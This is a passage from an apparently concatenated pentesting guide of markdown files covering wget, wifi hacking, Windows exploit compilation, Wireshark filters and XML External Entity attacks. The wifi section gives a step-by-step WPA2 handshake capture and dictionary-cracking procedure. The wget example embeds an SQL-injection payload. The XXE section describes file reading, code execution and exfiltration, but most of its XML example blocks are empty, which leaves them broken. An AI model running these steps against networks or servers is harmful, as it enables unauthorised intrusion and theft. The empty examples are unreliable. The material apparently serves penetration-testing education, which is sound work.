| %> 97 | ``` 98 | 99 | 100 | ## References 101 | 102 | http://www.acunetix.com/blog/articles/keeping-web-shells-undercover-an-introduction-to-web-shells-part-3/ 103 | http://www.binarytides.com/web-shells-tutorial/ -------------------------------------------------------------------------------- /wep.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/wep.md -------------------------------------------------------------------------------- /wget.md: -------------------------------------------------------------------------------- 1 | # wget 2 | 3 | Wget is just an incredible useful tool. It be used to download stuff. 4 | 5 | If you need to use wget through a proxy you can do the following: 6 | 7 | ``` 8 | wget "http://example.com/get_album_item.php?size=version%28%29%20;%20--" -O output.txt -e use_proxy=yes -e http_proxy=192.168.101.8:3128 --proxy-user "username" --proxy-password "password" 9 | ``` 10 | -------------------------------------------------------------------------------- /wifi.md: -------------------------------------------------------------------------------- 1 | # Wifi 2 | 3 | 4 | There are quite a few different security mechanism on wifi. And each of them require a different tactic. This article outlines the different strategies quite well. http://null-byte.wonderhowto.com/how-to/hack-wi-fi-selecting-good-wi-fi-hacking-strategy-0162526/ 5 | 6 | 7 | This is a great guide to the many different ways to hack wifi. 8 | 9 | ### Checking what networks are avalible 10 | 11 | `sudo iwlist wlan0 scanning` - scans for wifis 12 | 13 | ### Hacking WPA2-wifis Using airmon-ng and cowpatty 14 | 15 | What we are going to to here it basically just to record the 4-way handshake and then run a dictionary attack on it. The good part about this strategy is that you won't have to interfere to much with the network and thereby risk of taking down their wifi. The bad part is that if you run a dictionary attack there is always the possibility that the password just isn't in the list. 16 | 17 | 1. Start airmon-ng 18 | - `airmon-ng start wlan0` 19 | - This puts the network card in monitoring mode. 20 | - This will create a network interface that you can use to monitor wifi-action. This interface is usually called mon0 or something like that. You see the name when you run the command. 21 | 22 | 2. Run airodump to see what is passing through the air 23 | - Now we want to see what access points are available to us. 24 | - `airodump-ng -i mon0` 25 | - This would output something like this: 26 | 27 | ``` 28 | CH 13 ][ Elapsed: 6 s ] 29 | 30 | BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 31 | 32 | E8:DE:27:31:15:EE -62 40 54 0 11 54e WPA2 CCMP PSK myrouter 33 | A7:B6:68:D4:1D:91 -80 7 0 0 11 54e WPA2 CCMP PSK DKT_D24D81 34 | B4:EE:B4:80:76:72 -84 5 0 0 6 54e WPA2 CCMP PSK arrisNetwork 35 | 36 | BSSID STATION PWR Rate Lost Frames Probe 37 | 38 | E8:DE:27:31:15:EE D8:A2:5E:8E:41:75 -57 0e- 1 537 14 39 | ``` 40 | 41 | So what is all this? 42 | `BSSID` - This is the mac-address of the access point. 43 | `PWR` - Signal strength. The higher (closer to 0) the strength the stronger is the signal. In the example above it is myrouter that has the strongest signal. 44 | `Beacon` - This is kind of like a packet that the AP sends out periodically. The beacon contains information about the network. It contains the SSID, timestamp, beacon interval. If you are curious you can just analyze the beacons in wireshark after you have captured them. 45 | `#Data` - The number of data-packets that has been sent. 46 | `#/s` - Number of data-packets per second. 47 | `CH` - Channel 48 | `MB` - Maximum speed the AP can handle. 49 | `ENC` - Encryption type 50 | `CIPHER` - One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. 51 | `PSK` - The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP). 52 | `ESSID` - The name of the network 53 | 54 | Then we have another section of information. 55 | `Station` - MAC address of each associated station or stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of “(not associated)”. So yeah, this basically means that we can see what devices are looking for APs. This can be useful if we want to create an evil twin or something like that. 56 | 57 | 3. Find the network you want to access. 58 | - `airodump-ng --bssid A7:B6:68:D4:1D:91 -c 11 -w cowpatty mon0` 59 | - So this command will record or traffic from the device with that specific MAC-address. -c defines the channel. and `-w cowpatty` means that we are going to save the packet capture with that name. 60 | Now we just have to wait for a user to connect to that network. And when he/she does we will record that handshake. 61 | We know that we have recorded a handshake when this appears 62 | `CH 11 ][ Elapsed: 19 hours 52 mins ][ 2016-05-19 17:14 ][ WPA handshake: A7:B6:68:D4:1D:91` 63 | Now we can exit airodump, and we can see that we have a cap-file with the name cowpatty-01.cap. That is our packet-capture, and you can open it and study it in wireshark if you like. 64 | 65 | 4. Crack the password. 66 | - Now that we have the handshake recorded we can start to crack it. We can do that by using the program cowpatty. 67 | - `cowpatty -f /usr/share/wordlists/rockyou.txt -r cowpatty-01.cap -s DKT_D24D81` 68 | Then we just hope for the best. 69 | 70 | 71 | ##More 72 | Kicking other people off the network to capture handshakes faster: 73 | http://www.aircrack-ng.org/doku.php?id=newbie_guide 74 | 75 | http://lewiscomputerhowto.blogspot.cl/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html 76 | 77 | http://radixcode.com/hackcrack-wifi-password-2015-step-step-tutorial/ 78 | 79 | -------------------------------------------------------------------------------- /windows.md: -------------------------------------------------------------------------------- 1 | # Windows 2 | 3 | Whether you like it or not Windows is the most common OS for desktop users in the world. So for a pentester it is fundamental to understand the ins and outs of it. 4 | 5 | So this chapter will contain some basics about Windows and windows networks. 6 | 7 | We will also look a bit at PowerShell and of course the good old CMD. -------------------------------------------------------------------------------- /windows_exploitation.md: -------------------------------------------------------------------------------- 1 | # Windows exploitation 2 | 3 | If you want to exploit a service on a windows machinebut you are using a linux you can compile and run the exploit from linux, like this: 4 | 5 | 6 | ``` 7 | i686-w64-mingw32-gcc exploit.c -o exploit.exe 8 | ``` 9 | 10 | Then run it like this 11 | 12 | ``` 13 | wine exploit.exe 14 | ``` -------------------------------------------------------------------------------- /wireshark.md: -------------------------------------------------------------------------------- 1 | # Wireshark 2 | 3 | So now that you have entered a network and intercepted the traffic it is time to analyze that traffic. That can be with wireshark. 4 | 5 | ## Filters 6 | 7 | There are two types of filters that we can use. 8 | 1. Capture filter 9 | - This filters out in the capture process, so that it does not capture what you have not specified. 10 | 2. Display filter 11 | - This filter just filters what you see. You might have captured 1000 packets, but using the display filter you will only be shown say 100 packets that are relevant to you. 12 | 13 | The syntax for the two filters are a bit different. 14 | 15 | ### Capture filter 16 | So if you just start capturing all traffic on a network you are soon going to get stuck with a ton of packets. Too many! So we might need to refine out capture. 17 | 18 | Click on the fourth icon from the left. If you hover over it it says `Capture options` 19 | 20 | Some useful might be. 21 | From a specific host and with a specific port: 22 | ``` 23 | host 192.168.1.102 24 | port 110 25 | ``` 26 | 27 | 28 | ### Display filter 29 | 30 | Show only packets used by this IP-address, or to a specific port 31 | ``` 32 | ip.addr == 192.168.1.102 33 | tcp.port eq 25 34 | ``` 35 | 36 | ### Automatically resolve ip-addresses 37 | 38 | Easy 39 | https://ask.wireshark.org/questions/37680/can-wireshark-automatically-resolve-the-ip-address-into-host-names 40 | 41 | -------------------------------------------------------------------------------- /wps.md: -------------------------------------------------------------------------------- 1 | # WPS 2 | 3 | -------------------------------------------------------------------------------- /write_exploits.md: -------------------------------------------------------------------------------- 1 | # Write exploits 2 | 3 | If you want to write or port an exploit to metasploit this is how you can do it. 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /xml_external_entity_attack.md: -------------------------------------------------------------------------------- 1 | # XML External Entity Attack 2 | 3 | With this attack you can do: 4 | 5 | * Read local files 6 | * Denial-of-service 7 | * Perform port-scan 8 | * Remote Code Execution 9 | 10 | Where do you find it: 11 | 12 | * Anywhere where XML is posted. 13 | 14 | * Common with file-uploading functionality. For files that uses XML, like: docx, pptx, gpx, pdf and xml itself. 15 | 16 | ### Background XML 17 | 18 | XML is a markup language, like HTML. Unlike HTML is does not have any predefined tags. It is the user that create the tags in the XML object. XML is just a format for storing and transporing data. XML uses tags and subtags, just like html. Or parents, children, and syblings. So in that sense it has the same tree-structure as html. 19 | 20 | To define a XML-section/document you need the following tag to begin: 21 | 22 | ``` 23 | 24 | ``` 25 | 26 | Example of valid XML: 27 | 28 | ``` 29 | 30 | 31 | Hello World 32 | 33 | ``` 34 | 35 | [https://www.owasp.org/index.php/XML\_External\_Entity\_\(XXE\)\_Processing](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing) 36 | 37 | ### Syntax rule 38 | 39 | * Must have root element 40 | * Must have XML prolog 41 | 42 | ``` 43 | 44 | ``` 45 | 46 | * All elements must have closing tag 47 | * Tags are case-sensitive 48 | * XML Attributes must be quotes 49 | * Special characters must be escaped correctly. 50 | 51 | | < | < | less than | 52 | | :--- | :--- | :--- | 53 | | > | > | greater than | 54 | | & | & | ampersand | 55 | | ' | ' | apostrophe | 56 | | " | " | quotation mark | 57 | 58 | * Whitespace is perserved in XML 59 | 60 | ### Attack 61 | 62 | So if an application receives XML to the server the attacker might be able to exploit an XXE. It could be sent as a GET, but it is more likely that it is send in a POST. An attack might look like this: 63 | 64 | ``` 65 | 66 | 68 | ]>&xxe; 69 | ``` 70 | 71 | The elemet can be whatever, it doesn't matter. The xxe is the "variable" where the content of /dev/random get stored. And by dereferencing it in the foo-tag the content gets outputted.This way an attacker might be able to read files from the local system, like boot.ini or passwd. SYSTEM means that what is to be included can be found locally on the filesystem. 72 | 73 | In php-applications where the expect module is loaded it is possible to get RCE. It is not a very common vulnerability, but still good to know. 74 | 75 | ``` 76 | 77 | 78 | ]> 79 | 80 | &xxe; 81 | mypass 82 | 83 | ``` 84 | 85 | Even if the data is not reflected backto the website it is still possible to exfiltrate files and data from the server. The technique is similar to how you exfiltrate the cookie in a Cross-Site Scripting attack, you send it in the url. 86 | 87 | ### Test for it 88 | 89 | * Input is reflected 90 | 91 | ``` 92 | ]>&xxe; 93 | ``` 94 | 95 | If "testdata" gets reflected then it is vulnerable to XXE. If it gets reflected you can try to exfiltrate the data the following way: 96 | 97 | ``` 98 | 100 | ]>&xxe; 101 | ``` 102 | 103 | Another way to test it is to see if the server tries to download the external script. Firs t you need to set up your own webserver, and then wait for it to connect. 104 | 105 | ``` 106 | ]>&xxe; 107 | ``` 108 | 109 | ### Exfiltrate data through URL 110 | 111 | https://blog.bugcrowd.com/advice-from-a-researcher-xxe/ 112 | 113 | ### References 114 | 115 | [https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/](https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/) 116 | 117 | [https://blog.bugcrowd.com/advice-from-a-researcher-xxe/](https://blog.bugcrowd.com/advice-from-a-researcher-xxe/) 118 | 119 | http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html 120 | 121 | --------------------------------------------------------------------------------